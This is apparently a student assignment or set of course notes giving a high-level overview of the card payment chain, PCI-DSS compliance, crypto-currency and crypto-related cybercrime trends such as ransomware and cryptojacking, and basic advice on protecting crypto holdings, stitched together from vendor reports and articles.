• IndividualUser Agreement Template
• Data ClassificationPolicy
• Data Protection Policy
• Data Management Policy
9. You need to comply with PCI-DSS standards on a daily basis, even after the successful audit.
10. Consider the regular position of CISSP to control all security activities.
• The individual initiates a transactionby swipinga credit card issued in their name. The buyer receives merchandise from the merchant, which is paid for by the issuing bank. The cardholder has an understandingwith the bank that they will repay the issuer for the transactionlater when they pay their monthly credit card bill.
• The store or eCommerce shop owner with whom the cardholder has initiated the purchase. The merchant generally accepts credit cards to facilitate payments for transactions. They may also accept other methods of payment includingcash, debit, and contactless technologies.
• The merchant’s bank, which sends transactionand authorizationdetailsahead to the card network for approval. The acquirer then plays a role in relayingthe issuing bank’s response to the merchant. Sometimes, these actions will be performed inhouse, or they may be done with a third-party payment processor or merchant services provider.
• For many merchants, their acquirer also serves as their payment processor. In other cases, though, these may be two separate entities. This processor serves to facilitate communications between the acquiring bank and the merchant. These third-party payment facilitators will assume the responsibility of sending and receiving transaction details and authorization, which it will then provide to the merchant or bank, respectively.
• The credit card associations operate branded credit card networks that facilitate global transactions for a given credit card. They also set the rules and guidelines all banks and merchants must follow to use said platforms and govern interchange fees (more on this below). The most widely-used card networks in the US are Visa, Mastercard, American Express, and Discover. The card network will accept authorization requests from the merchant’s acquiring bank, then forward that information to the cardholder’s issuing bank for approval.
• The cardholder’s bank or card-issuing payment account facilitator. The issuing bank will receive payment authorization requests through the acquiring bank, card network, or via the third-party processor, then relays an approval or decline response along the same channels to the acquiring bank.
4.1: Evaluate emerging trends and threats from crypto-currency related attacks by cyber criminals.
• The first half of 2019 demonstrated that no environment is immune to cyber attacks.
• We have witnessed threat actors developing new tool sets and techniques, targeting corporate assets stored on cloud infrastructure, individual’s mobile devices, trusted thirdparty supplier’s application and even popular mail platforms.
• One of the dominating ongoing trends in 2019 is targeted ransomware attacks. This year collaborations between threat actors allowed even more destructive attacks that paralyzed numerous organizations worldwide.
• What ends with a ransomware attack usually starts with a more silent sequence of bot infections. Still highly visible, crypto miners are on the decline this year – only 21% of organizations worldwide were affected by crypto miners’ attacks in comparison to 42% during it speak in 2018. This was the outcome after shutting down the ‘Coin Hive’ driveby mining service.
• Software supply chain attacks attracted public and government attention. In such attacks threat actors inject malicious code into components of legitimate applications, victimizing a large number of unsuspecting users.
• The accumulation of several cases since the beginning of the year led the American government to devote special attention to this evolving threat and will soon publish official recommendations on ways to minimize the impact of such attacks.
• To provide organizations with the best level of protection, security experts should be attuned to the ever-changing landscape and the latest threats and attack methods.
• With data drawn from Check Point’s Threat Cloud World Cyber Threat Map between January and June 2019, combined with primary research performed by the company’s cyber security experts , the following report holds a comprehensive overview of the trends observed in the various categories of crypto miners, ransomware, botnet, banking Trojans, data breaches, and mobile threats.
• Cyber security is the process of protecting systems, devices, networks, and data from any type of unauthorized access or attack.
• Cyber- attacks typically try to gain access to sensitive information and alter, disrupt, destroy, or control that information for malicious or criminal intent.
• These attacks are of increasing concern to businesses and individuals. As more information and data continues to move online, everything from emails and credit cards to navigation systems and medical records are susceptible to digital attacks.
• Crypto currency is a decentralizeddigitalcurrency. It is stored usingblock chain technology and is not regulated by any bank, government, or financial institution.
• Decentralizationis one of the main features that sets crypto currency (often shortened to “crypto”) apart from other currencies. It can be created and issued by anyone, and as a result countless different crypto coins are available.
• The two most popular and widely recognized currencies are Bitcoin and Ethereum, stored on the Bitcoin and Ethereum block chains respectively.
• Crypto can, in theory, be used like any other currency to purchase goods and services.
• In recent years, however, many have started to treat new crypto currencies like speculative stocks. Crypto traders buy and hold large quantities of crypto, bettingthat its value will increase.
• If it does, they can sell it and make a profit. More often than not, these speculations end in disaster because coins can lose their value in a matter of minutes.
• While pump-and-dump scams and rugpulls are a constant threat to crypto investors, they’re not the only risks you have to worry about in this space. Even if the coin you’re holdingmaintains or gains value, you may still end up losingyour money because of a crypto hack.
A crypto hack involveshackers accessing and stealing your crypto coins without your authorization.Here are some of the most common crypto hacking techniques.
• Bridge attacks involvehackers targeting your crypto as it is transferred from one block chain to another.
• Each coin exists on a block chain (a decentralized database,usually referred to as a ledger). Protocols that transfer your currency from one block chain to another (for example, if you want to turn Bitcoin into Ethereum) are called cross-chain bridges. Bridges are essential for block chain interoperability,but they’re also vulnerableto hacking.
• Cybercriminalscan use any number of methods to target cross-chain bridges, from exploitingbugs in a bridge’s code to utilizingleaked cryptographic keys. Some hackers have even managed to trick crosschain bridge systems with bogus coins, converting them into real and valuablecurrencies on other block chains.
• Wallets are applications that allow you to access, manage, and move your crypto currency. These programs can be installed on a device like a smartphone or a computer and are either hot (always connected to the internet) or cold (offline). If you have a hot wallet on a device, then a bad actor who hacks that device could get into your crypto wallet and raid your funds.
• Many crypto enthusiasts use coin exchanges to store and manage their currency. Exchanges are online platforms through which you can buy and sell crypto, or store it and gain interest. While exchanges provide a useful service, they are not without risk. Exchanges hold huge amounts of crypto currency on behalf of their users, so hackers target them constantly, using exploits, phishing emails, and social engineering attacks. If a crypto currency exchange is breached, coins stored in the exchange’s hot wallets can be stolen.
Crypto hackers use many different tactics to steal coins. Phishing emails.
This method involves hackers sending emails to trick people into downloading malware or exposing sensitive information. The email will usually contain a link to a page that installs malware on the victim’s device. A hacker can then use this malware to take control of the device or to secretly monitor its activity. If the victim has a hot wallet application on their device, it’s just a matter of time until the hacker steals their funds. Exploits.
• The software used to facilitate the storage and transfer of crypto currency is often targeted by hackers. Whether it’s a cross-chain bridge or a crypto currency exchange, any piece of crypto infrastructure could contain bugs and unpatched vulnerabilities. If hackers find these weak spots, they can exploit them in bridge attacks and exchange heists.
• The simplest way for a hacker to steal crypto is just to use the private keys that allow you to access your funds on the block chain. Anyone who has the keys to your wallet can move your coins, so if your keys leak — if they were stored in an unhashed format on a device which was later hacked, for example — an attacker can open your wallet and move any coins it contains to their own
• Crypto currency is peer-to-peer electronic cash in its most basic form. It allows internet payments to be sent directly from one party to another without going through a financial institution.
• Cryptographic proof of work is used to time stamped transactions on the network.
• A subset of the word "digital currency" is referred to as "crypto currency." Digital currencies that can be exchanged for virtual and physical items in a closed system and exchanged for fiat currency in an open system include airline miles, game to- kens for video games and online casinos, Brixton Pound for use only in the Brixton local community in the Greater London area, and several others.
The general arguments for a successful distributed crypto currency are as follows:
1. Open-source software: A core and trustworthy group of developers must validate the code and future revisions for network implementation.
2. Decentralized: Even though it is not distributed, it mustn't be dominated by a single group of people or organization.
3. Peer-to-peer: While avoiding the need for intermediaries is the goal, pools of sub networks can form.
4. Global: Whether or not the parties implement smart contracts, the currency is worldwide, which is significant for financial integration.
5. Transactions can be done faster, and confirmation times can be cut in half.
• Reliability: It has the advantage of being non-repudiable and not requiring arbitration. As a result, a large settlement team might save a lot of money on financial transactions.
• Secure: The privacy architecture can be improved by combining proof of identity with encryption. If this is done, the issues of Know Your Customer/ Client (KYC) and anti-money laundering and terrorist financing (AML/TF) can be handled.
• Advanced and adaptable: A vast range of properties, financial instruments, and markets would be accommodated and catered to by the gadget.
• Automated: Algorithms can be used to automate payments and contracts swiftly.
• Scalable: The device will be used by millions of individuals.
• Incorporation platform: It can be designed to mix digital finance and digital law with a smart contract and financial transaction environment. In customized agreements between multiple parties, user-defined scripting clauses, hooks, and variables may be employed.
There are four major categories of cyber crime that lean heavily on, or fully require, the use of crypto currencies like Bitcoin, Ethereum and Monero: ransomware, DDoS extortion, cryptojacking and crypto theft.
• Ransomware is usually facilitated by crypto currency, for example. The scam typically involves malware-encrypted files, which perpetrators say they’ll unlock when the victim pays the ransom. Paying in crypto allows criminals to maintain anonymity and non-traceability. (In the increasingly common “double extortion” variant, malicious actors also threaten to expose the files publicly if victims don’t pay).
• DDoS extortion is similar to ransomware. Instead of gaining access to and encrypting files, however, cyber attackers launch a sustained DDoS attack until a ransom in crypto is paid.
• Another major crime is illegal crypto currency mining, called crypto jacking. Malicious hackers gain access to computing power owned by others, usually via special malware. They then use it to mine crypto illegally.
• Unlike most kinds of computer-relatedcrimes, crypto jackers don’t steal money or data directly or demand ransom payments. Instead, they steal computer resources. This translates to higher energy costs, lower performance for users and accelerated declines in battery performance.
• Crypto jacking actually rose in 2022. An Atlas VPN analysis found that instances of crypto jacking grew 3.8 times in the third quarter of 2022. (Interestingly, the number of victims declined.)
• Analysts assume that crypto jackers are anticipatinggrowth in crypto after it hits bottom and are illegally miningaggressively in the hopes of profiting.
• Finally, crypto theft is the hackingof crypto exchanges and other platforms to steal coins directly from their rightful owners. This kind of attack has been reduced because the crypto exchanges themselves were going out of business with the crash in the value of crypto currencies.
• Cyber criminals use dark web exchanges because they don’t check user identities.
• These don’t typically store currencies but merely enable the exchange of crypto from one service to another, often at inflated fees.
• These exchanges operate in many ways like legitimate businesses. They need to spend big on advertising, for example, in part to engender trust amongmalicious actors who themselves don’t want to get ripped off.
• Crashingcrypto currency prices are squeezingdark web exchanges. This reduces incentives for threat actors because it reduces income, makes vulnerability purchasingmore expensive and cuts revenue needed to fund Malware-as-a-Service organizations.
• In other words, fallingcrypto prices kneecapped the purchasingpower of organizations usingcrypto for illegal activities.
• During the rapid declines in early 2022, exchanges tried to convert their crypto to fiat currencies, such as the U.S. dollar (a currency issued by a government not backed by a physical commodity, such as gold or silver), but the value after conversion wasn’t enough to sustain the business.
• Advertisingfor dark web exchanges nearly stoppedin the Spring of 2022. Many went bankrupt or out of business.
• The crypto currency value drop radically slowed financial crimes, includingillegal dark web transactions. Losses for the first half of 2022 were way down, accordingto block chain data company Chain alysis. Scammer income dropped by two-thirds — 65% — for the first seven months of the year.
• It’s easy to conclude that the drop in the value of crypto currencies directly caused the decline in scam revenue. But that would be a mistake.
• This drop wasn’t due entirely to the drop in crypto currency, accordingto the report. Both potential victims and police chalked up notable successes in counteringsuch scams. In other words, the general defense against some of these crimes has improved, and credit there is due.
• Another point to consider is that total annualscam revenue is usually determined by a very small number of very large scams.One massive scam could upend these numbers and reverse the trend.
• In addition, the crash caused crypto currency transactionvolumes— both legitimate and illegal — to fall. So it reduced “good” transactions in equal measure as “bad” ones.
• Also, ransomware gangs likely don’t care if the value of crypto currencies is low. They demand ransoms typically in U.S. dollar amounts in the form of whatever quantity of crypto currencies are equivalent at the time of demand.
• While there may be a disincentive to strike while crypto is rapidly declining, once it hits bottom, that disincentive is removed. Volatility in one direction (down)disincentivizes ransomware temporarily. Unfortunately, ransomware is here to stay.
• Most importantly, however, it would also be a mistake to assume that crypto currency valuations will stay low, or that reductions in crimes that rely on crypto currencies will stay low. The consensus amongexperts is that such crimes will come roaringback to life.
• Ransomware began as malware focused on extorting payments via data encryption. By denying legitimate users access to their data by encrypting it, the attackers could demand a ransom for its recovery.
• However, the growth of ransomware threats has resulted in focused security research designed to identify and remediate these threats. The process of encrypting every file on a target system is time-consuming — making it possible to save some data by terminating the malware before data is encrypted — and companies have the potential to restore from backups without paying the ransom.
• Double extortion attacks added data theft to data encryption, and some ransomware operators have shifted to focus solely on the extortion effort, skipping encryption entirely. These ransomware data breaches are faster to carry out, harder to detect, and cannot be fixed using backups, making them a more effective approach for cybercriminals and a greater threat to businesses.
• Companies are increasinglyadopting cloud computing, a move with significant security implications.Unfamiliaritywith cloud security best practices, the cloud shared security model, and other factors can make cloud environmentsmore vulnerableto attackthan on-prem infrastructure.
• While cybercriminals are increasingly targeting cloud infrastructure with exploits for new vulnerabilities,an emerging and worrying tactic is the targeting of cloud service providers. By targeting cloud service providers and cloud solutions with their attacks,a cybercriminal can gain access to their customers’ sensitive data and potentially theirIT infrastructure. By exploiting these trust relationshipsbetween organizationsand their service providers, attackers can dramatically increase the scale and impact of their attacks.
• These attempts to infect user’s mobile devices have expanded from fake apps to cracked and custom versions of legitimate apps. Cybercriminals are offering unofficial versions of apps as malicious APKs via direct downloadsand third-party app stores. These apps are designed to take advantageof name recognition to slip malware onto employee devices.
• While ransomware and data breaches are some of the most visible threats to corporatedata security, wipers and other destructive malware can have even greater business impacts. Instead of breaching information or demanding a ransom for its return, wipers delete the data entirely.
• While wipers havebeen relativelyrare in the past, they experienced a resurgence in 2022. Multiplefamilies of wipers havebeen developed and deployed againstUkraine as part of its conflict with Russia. Other countries, including Iran and Albania,have also been targeted by destructive cyber attacks, indicatingits growing popularityas a tool for hacktivismand cyber warfare.
• The line between legitimate penetrationtestingand system administration tools and malware can be a fine one. Often, functionality that cyber threat actors would build into their malware is also built into their targets’ operatingsystems or available via legitimate tools thatare unlikely to be recognized as malware by signature-baseddetectiontools.
• Cyber threat actors have been increasingly takingadvantage of this to “live off the land”in their attacks. By leveragingbuilt-in features and legitimate tools, they decrease their probability of detection and improve the likelihoodof a successful attack. Also, the use of existingsolutions can help to scale attack campaigns and allow cybercriminals to use the state of the art in hacking tools.
• Zero-day vulnerabilities pose a significant but transient risk to corporate cyber security. A vulnerability is a zero day when it has been discovered but no fix is available for the issue. Duringthe window between the initial exploitation of a vulnerability and the vendor’s release of a patch for it, cybercriminals can exploit the vulnerability unchecked. However, even after a patch is available, it is not always promptly applied by businesses. Some cyber attack campaigns target vulnerabilitiesthat have been known and “fixed” for months or years. Various reasons exist for these delays, includingresource availability, security visibility, and prioritization.
• One area where zero-day attacks and unpatchedvulnerabilitiesare especially concerningis the software supply chain. Often, companies lack full visibility into the third-party, open-source code that their applications use. If these external librariescontainunpatchedvulnerabilities, cybercriminals can leverage them to attack the organization. Additionally, widely-used vulnerable libraries create potential attack vectors against multiple organizations.
• Cybercrime is a problem that is rapidly growingon a global scale. In Q3 2022, global cyber attacks increased by 28% compared to the same quarter in 2021. Goinginto 2023, this trend is only likely to continue. A mature corporate cyber security program needs to be capable of defendingagainstthreats originatingfrom all around the world. This includes comprehensive threatprotection, round-the-clock monitoring, and access to up-to-date threat intelligence.
Security Consolidation
• Cyber security is growing increasingly complex as IT infrastructures expand and cyber threat actors develop and deploy new attack techniques. As a result, companies need an expanding suite of security capabilities to protect themselves against advanced attacks.
• However, attempting to implement these capabilities via standalone, specialized solutions can actually harm corporate cyber security by making it more difficult to monitor, configure, and operate an organization’s security infrastructure.
• Security consolidation — in which an organization deploys a single security platform with all of the required security capabilities — improves the efficiency and effectiveness of the organization’s security architecture and team, enhancing its threat management capabilities.
• Many corporate cyber security strategies are detection-focused. Once an active threat has been identified, the organization’s security solutions and personnel take action to mitigate or remediate the ongoingattack. However, a responsive approach to security means that the attacker has a window between launching their attack and its eventual remediationto take malicious actions. During this window, the cyber threat actor can cause harm to the organization and expand and entrench their foothold, making remediation more difficult and expensive.
• Instead of focusingon detection, security should have a prevention focus. By identifyingand blockinginbound attacks before they reach an organization’s systems, a company eliminates the potential threat, damage, and cost to the organization.
• The evolution of corporate IT architectures has provided cybercriminals with numerous potential avenues of attack against an organization.
• Cloud adoption, remote work, mobile devices, and the Internet of Things (IoT) are only a few examples of new technologies that have introduced new security risks.
• Cyber threat actors can identify and exploit a wide range of vulnerabilities to gain access to corporate systems.
• An effective cyber security program is one that provides comprehensive coverage and protection for all potential attack vectors.
• The future of crypto currency is uncertain. Mainstreamadoption is still far off, and intense market volatilityis discouragingindividualsand companies from getting involved.Public awareness around crypto currency and block chain technology has grown rapidlyover the last five years, but much of the publicitycenters around scandals, scams, and market crashes.
• The recent collapseof FTX, a major crypto exchange, was a reminder to everyone in the market that even companiesconsidered to be secure and mainstream can fall apart in a matter of hours. The subsequent revelation that FTX may have been hacked, with millionsof dollars of crypto potentially lost,underlined the general feeling of chaos and uncertaintyin the digital currency market.
• Many crypto enthusiasts insist that these problems are temporary. In the long run, they see digital currency and the block chain as foundational elements in a freer, more decentralized version of the internet. They also insist that a block chain network can serve non-crypto-related purposes, and that’s true: smart contracts, data storage, and the storage of NFTs are all viable block chain functions.
• For now, however, the technology’s primary use case remains crypto currency, for better or for worse. If you’re going to keep using crypto currency yourself, it’s important to protect yourself from the risks that come with it.
• Protect your keys. Whoever holds your cryptographic keys can gain access to your funds. It’s essential that you keep these numerical passcodes private, so if you’re going to store your keys somewhere, protect them with encryption. For example, use an encrypted storage service like NordLocker to keep all your sensitive data, includingcryptographic keys, shielded from prying eyes. If you have an account with a crypto exchange, make sure to use multi-factor authentication and a password manager, like NordPass.
• Don’t keep all your funds in a hot wallet. Hot wallets are convenient,but they’re also much more vulnerableto hacking than cold alternatives.Anythingthat is connected to the internet is vulnerableto hacking. Whenever possible, keep your coins in cold wallets.
• Research a crypto currency exchange before using it. Crypto exchanges play a major role in the crypto economy, but if you’re going to use one, it’s essential that you do your research. Who runs the crypto exchange? Have they been involved in other projects in the past? You don’t want to trust your funds to a company that may not handle them securely. The same logic should apply to any service you trust with funds: if you’re using a cross-chain bridge protocol, for example, research it in advance.
• Limit the threat of malware. Hackers can install malware on your device and use it to monitor your activity, log your keystrokes, and raid your crypto currency. To protect yourself, be extremely wary of unexpected emails that contain links or attachments, even if the sender seems legitimate. You can also use NordVPN’s Threat Protection feature, which prevents you from accessing websites known for malware installation.
• https://www.scribd.com/read/514
532203/Learn-How-to-Earn-withCryptocurrency-Trading
• https://www.scribd.com/read/438
409929/How-to-Keep-Your-StuffSafe-Online
• https://www.scribd.com/document /430900402/5c4f67ee7deb5948e2
941fda-Chainalysis-January-2019Crypto-Crime-Report
